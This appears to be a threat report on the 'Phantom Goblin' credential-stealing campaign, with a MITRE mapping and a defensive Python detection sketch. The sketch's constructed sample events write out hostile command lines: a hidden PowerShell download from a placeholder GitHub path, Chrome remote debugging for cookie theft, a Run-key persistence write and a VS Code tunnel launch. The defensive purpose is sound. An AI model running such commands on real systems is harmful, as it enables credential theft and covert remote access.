Phantom-Goblin: Covert Credential Theft and VSCode Tunnel Exploitation

A newly identified malware operation, named “Phantom Goblin,” uses social engineering to deceive users into executing a malicious LNK file that triggers a PowerShell script to download and execute additional payloads. These payloads enable the malware to extract sensitive data, maintain unauthorized remote access via Visual Studio Code tunnels, and exfiltrate the stolen data to a Telegram bot. Affected: Malware, Web Browsers, User Credentials, Information Security

Key points:

  • Threat actors use social engineering to trick users into executing a malicious LNK file disguised as a PDF document.
  • The malware downloads and executes additional payloads via PowerShell from a GitHub repository.
  • It ensures persistence by modifying registry entries.
  • Browser cookies are extracted through remote debugging, bypassing Chrome’s App Bound Encryption.
  • A Visual Studio Code tunnel is established for unauthorized remote access.
  • Stolen data, including cookies and credentials, is sent to a Telegram bot for exfiltration.
  • The malware disguises itself as legitimate applications to evade detection.
  • Users are advised to avoid executing unexpected RAR, ZIP, or LNK files.
  • Robust endpoint protection and real-time threat detection are recommended to combat these types of attacks.

MITRE Techniques:

  • Initial Access (TA0001) – Phishing: Spearphishing Attachment (T1566.001) – Malicious RAR attachments containing LNK files delivered via spam emails.
  • Execution (TA0002) – User Execution: Malicious File (T1204.002) – Users execute the malicious LNK file disguised as a document.
  • Execution (TA0002) – Command and Scripting Interpreter: PowerShell (T1059.001) – The LNK file runs a PowerShell script upon execution.
  • Persistence (TA0003) – Registry Run Keys / Startup Folder (T1547.001) – Adds a persistence entry under the Run registry key in the HKCU hive.
  • Defense Evasion (TA0005) – Obfuscated Files or Information: Software Packing (T1027.002) – The downloaded payloads are packed with UPX.
  • Defense Evasion (TA0005) – Masquerading: Match Legitimate Name or Location (T1036.005) – Payloads mimic the names of legitimate applications.
  • Discovery (TA0007) – Process Discovery (T1057) – Uses the tasklist command to discover running processes.
  • Credential Access (TA0006) – Credentials from Password Stores: Credentials from Web Browsers (T1555.003) – Steals saved credentials from browser files.
  • Credential Access (TA0006) – Steal Web Session Cookie (T1539) – Steals browser cookies from multiple browsers.
  • Lateral Movement (TA0008) – Remote Services (T1021) – Creates a VSCode tunnel for remote access.
  • Collection (TA0009) – Archive Collected Data (T1560) – Collected data is archived before exfiltration.
  • Command and Control (TA0011) – Application Layer Protocol: Web Protocols (T1071.001) – Uses the Telegram Bot API for data transfer.
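
As an added illustration for defenders (not code from the report or from Cyble), the following Python sketch runs behavioural rules for the chain mapped above over a few constructed process-creation events: PowerShell launched from Explorer with a download verb, a browser started with a remote-debugging port, a VS Code binary run with the tunnel command, a reg.exe write to the HKCU Run key, and tasklist. All paths, the GitHub path and the file names are placeholders, and the Run-key rule only sees reg.exe, not registry writes made through the API.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry); paths,
# the GitHub path and file names are placeholders standing in for the report's.
TMP = r"C:\Users\u\AppData\Local\Temp"
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -w hidden -c iwr https://raw.githubusercontent.com/EXAMPLE/x/main/updater.exe -OutFile " + TMP + r"\updater.exe"},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "parent": TMP + r"\updater.exe",
     "cmdline": "chrome.exe --headless --remote-debugging-port=9222"},
    {"image": TMP + r"\vscode.exe", "parent": TMP + r"\updater.exe",
     "cmdline": "vscode.exe tunnel"},
    {"image": r"C:\Windows\System32\reg.exe", "parent": TMP + r"\updater.exe",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d " + TMP + r"\updater.exe"},
    {"image": r"C:\Windows\System32\tasklist.exe", "parent": TMP + r"\updater.exe", "cmdline": "tasklist /fo csv"},
    # benign: PowerShell from Explorer with no download verb must not fire
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell -c Get-ChildItem C:\Projects"},
]

def _base(path):
    """File name of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()

# (rule name, ATT&CK id from the report's mapping, predicate over one event)
RULES = [
    ("powershell_downloader_from_explorer", "T1059.001",
     lambda e: _base(e["image"]) == "powershell.exe" and _base(e["parent"]) == "explorer.exe"
     and re.search(r"\biwr\b|invoke-webrequest|downloadfile|raw\.githubusercontent\.com", e["cmdline"], re.I)),
    ("browser_remote_debugging", "T1539",
     lambda e: _base(e["image"]) in {"chrome.exe", "msedge.exe", "brave.exe"}
     and "--remote-debugging-port" in e["cmdline"].lower()),
    ("vscode_tunnel", "T1021",  # matches code.exe and look-alike names such as vscode.exe
     lambda e: "code" in _base(e["image"]) and re.search(r"\btunnel\b", e["cmdline"], re.I)),
    ("hkcu_run_key_persistence", "T1547.001",  # reg.exe only; API writes need registry telemetry
     lambda e: _base(e["image"]) == "reg.exe"
     and re.search(r"hkcu\\software\\microsoft\\windows\\currentversion\\run\b", e["cmdline"], re.I)),
    ("tasklist_discovery", "T1057", lambda e: _base(e["image"]) == "tasklist.exe"),
]

def detect(events):
    """Return one hit per matching (event, rule) pair, in event order."""
    hits = []
    for e in events:
        for name, technique, pred in RULES:
            if pred(e):
                hits.append({"rule": name, "technique": technique,
                             "image": _base(e["image"]), "parent": _base(e["parent"])})
    return hits
```

Correlating the hits on a shared parent (here the placeholder updater.exe) is what turns five single-technique alerts into one incident.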

Indicators of Compromise:


Full Story: https://cyble.com/blog/phantom-goblin-covert-credential-theft/